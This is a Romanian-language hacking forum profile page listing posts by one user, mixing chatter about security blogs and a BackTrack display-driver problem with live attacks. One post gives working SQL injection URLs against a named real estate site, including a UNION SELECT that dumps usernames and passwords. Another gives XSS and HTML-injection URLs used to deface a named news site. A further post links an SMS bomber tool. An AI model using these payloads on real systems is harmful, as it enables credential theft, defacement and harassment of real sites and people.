Jump to content

Psycho Bunny

Members
  • Posts

    47
  • Joined

  • Last visited

Posts posted by Psycho Bunny

  1. Nu stiu ce faci tu acolo dar eu trimit de pe varianta online

    [url=http://daemienx.byethost3.com/isr/index.php][in]Security SMS Bomber[/url]

    si ca sa vezi dracie ca tot merge... iar daca asta trimite inseamna ca trebuie sa-ti trimita si de pe localhost dar undeva tot gresesti sau iti lipseste ceva.

    Later Edit: se pare ca nu mai merge cu mai mult de 5 ... plm

    si mai later edit: merge dar trebuie sa mai dai un refresh (in cazul localhost)

  2. nu stiu cum ai numarat tu 9 coloane ..


    http://realestate.doingbusiness.ro/en/partners/article.php?articleid=10+and+1=0+union%20select+1,2,unhex%28hex%28@@version%29%29--

    version() : 4.1.10a-standard

    ..easy one

    http://realestate.doingbusiness.ro/en/partners/article.php?articleid=10+and+1=0+union select+1,2,concat(username,0x3a,password)+from+users--

  3. pe langa XSS si IFRAME mai are si:

    TABLE:

    http://www.crainou.ro/?module=archives&op=search&search_string=%3Ctable%20width=%22800%22%20height=%22500%22%20%20%20border=%22100%22%3E%3Ctr%3E%3Ctd%3EARE%3C/td%3E%3Ctd%3ESI%3C/td%3E%3Ctd%3ETABEL%3C/td%3E%3C/tr%3E%3C/table%3E

    MARQUEE

    http://www.crainou.ro/?module=archives&op=search&search_string=%3Ch1%3E%3CMARQUEE%3EHACKED%20CU%20XSS%3C/MARQUEE%3E%3C/h1%3E

    si i-am dat si deface :-|

    http://www.crainou.ro/?module=archives&op=search&search_string=%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Ch1%3EHACKEDDDDDDDDDDDDDDDDDDDDDD%3C/h1%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E

    ..asa din plictiseala ..n-am mai insistat ca daca mai cautam poate mai gaseam si FORM, DIV, SPAN, LINK, IMG sau poate chiar EMBED free-love-smileys-357.gif .. etc , poate chiar mai CSS-uiam putin pagina aia. Liit nu?!

    NU !

  4. Permite-mi sa iti redefinesc conceptul de "acel CEVA" folosit in postul meu anterior!

    Nu m-am referit la modul ca HB a inventat sau brevetat tehnicile de SQL Injection, Cross Site Scripting ..etc. In schimb pina la aparitia lor eu nu am mai vazut pe nicaieri pe intreg web-ul bloguri/site-uri dedicate subiectului de Full Disclosure cu buguri si screenshot-uri cu bazele de date unor site-uri (servicii) arhicunoscute la nivel mondial cu baze de date astronomice si extrem de utilizate de 80% din toti cei care se bucura de avantajele unei simple conexiuni la internet.

    Deci fi mai cu bagare de seama si citeste de doua ori ca sa intelegi ideea!

  5. Conform modei lansate de HB si Unu' cu blogurile unde ca New Entry sunt subiectele cu vulnerabilitati din diverse site-uri sau aplicatii web au aparut foarte multi care abordeaza aceeasi tema. Intrebarea pe care acei ce ingroasa randurile acestui "nou curent" nu si-o pun este :"Dar de ce imi fac eu un asemenea blog?!"

    HackersBlog si unu.baywords la momentul inceputului proiectului lor aveau ceva ce voi nu prea aveti: originalitate + stil ! Ei au dat viata acelui CEVA ce nu prea se facea la momentul respectiv pe intreg WWW-ul si cu atat mai putin in Romania!

    Voi?! Puteti spune ce este original in subiectele blogului vostru? De ce ar intra cineva ca simplu vizitator sa vada niste XSS-uri sau SQLi-uri random in site-uri care nu prezinta nici un interes?

    De ce nu trimiteti foarte simplu xss-urile pe xssed.com si sqli pe HB de exemplu.. unde va puteti crea propria reputatie tinand cont ca site-urile care le-am mentionat mai sus ca pur exemplu ofera intotdeauna credite.

    Si plm poate imi explica si mie cineva care e faza cu iframe?! Deci ai gasit XSS in site-ul zdrente zdrente zdremte zdremte , fufe , parasute , vampe , pupeze - site dedicat barbatilor zdrente.ro zdrente.ro! Si WOW are si iframe?! nu pot sa cred ce tare..... NOT! normal ca injection pointul ala cu xss executa javascript sau cod html ca doar despre Cross Site Scripting vorbeam! Maine poimaine o sa vad posturi cu site-uri care au xss si care ca sa vezi frate ce chestie arata si pop-up! :-|

    In fine ... va urez foarte mult succes cu blogurile voastre, desi mai bine v-ati reprofila sau regandi tema pe care sa o abordati. Incercati sa veniti si voi cu un suflu nou macar pe plan romanesc daca va place ideea de a ironiza slabele capacitati ale asa zis-ilor webmasteri mioritici! Exista 'out there in the wild' o multitudine de alte tipuri de vulnerabilitati ..dar de ce sa abordam ceva ce nu e la moda, nu?!

    Exemplu (idiot) de situatie: daca de maine UNU ar posta numai site-uri vulnerabile RFI bag mainile in foc, ca apare alta moda cu shell-urile (ca acum asta se poarta fratzica) .

    Dar na, asa suntem noi .. copiem si noi ce vedem la altii mai mari si incercam sa ne dam rotunzi la minorele din fata blocului ca suntem niste Skilled Pentesteri ce pot face mari daune daca vor, dar ei e baieti buni si pun pe blog sa vada lumea!

    Din nou intrebare: "sa vada lumea ce?"

  6. Toate detaliile blogului tau iti dau de gol faptul ca esti un impatimit la wargames-urilor :)

    Felicitari pentru idee, bafta cu proiectul si la fel ca si black_death_c4t as sublinia faptul ca te-ar aranja mai bine un domeniu!

  7. datorita tie am dezlegat enigma cu conexiunea la net .. so 10x again.

    Acum am alta problema .. l-am instalat pe hard si se distruge xorg.conf dupa primul reboot daca ii modific rata de refresh la 75 (60 e pe default si e sacaitoare) si nu-mi mai porneste X-ul.

    ATI HD 3650 cam asta e placa.

    Am aplicat diverse metode pentru a configura placa video:

    1)Ubuntu Jaunty Installation Guide - cchtml.com

    2)fglrx

    3)vesa

    ....si aceeasi bucurie.

    Am facut cateva experimente , sa pornesc livecd , 75Hz din Control Panel, Ctrl Alt BAckspace si apoi startx ... la fel se modifca xorg.conf singur .

    sudo dpkg-reconfigure -phigh xserver-xorg il face si mai varza ..

    WTF is wrong with it???

    Am stat sa citesc si problemele altora la capitolul asta pe diverse forumuri si pe remote-exploit ..tot ce se indruma acolo am incercat si eu si nu vrea de nici un fel.

    LE: stiu ca BT4 e o distributie live si nu e prea optimizata pentru pretentii de screen refresh si multimedia... dar imi doream sa il folosesc pentru mai multe lucruri.. Fiind bazat pe ubuntu 8 daca nu ma insel, si placa nu e relativ tocmai noua ar trebuii sa fie o solutie.

    app: mi-am dat si toate drepturile root-ului din User-Groups

×
×
  • Create New...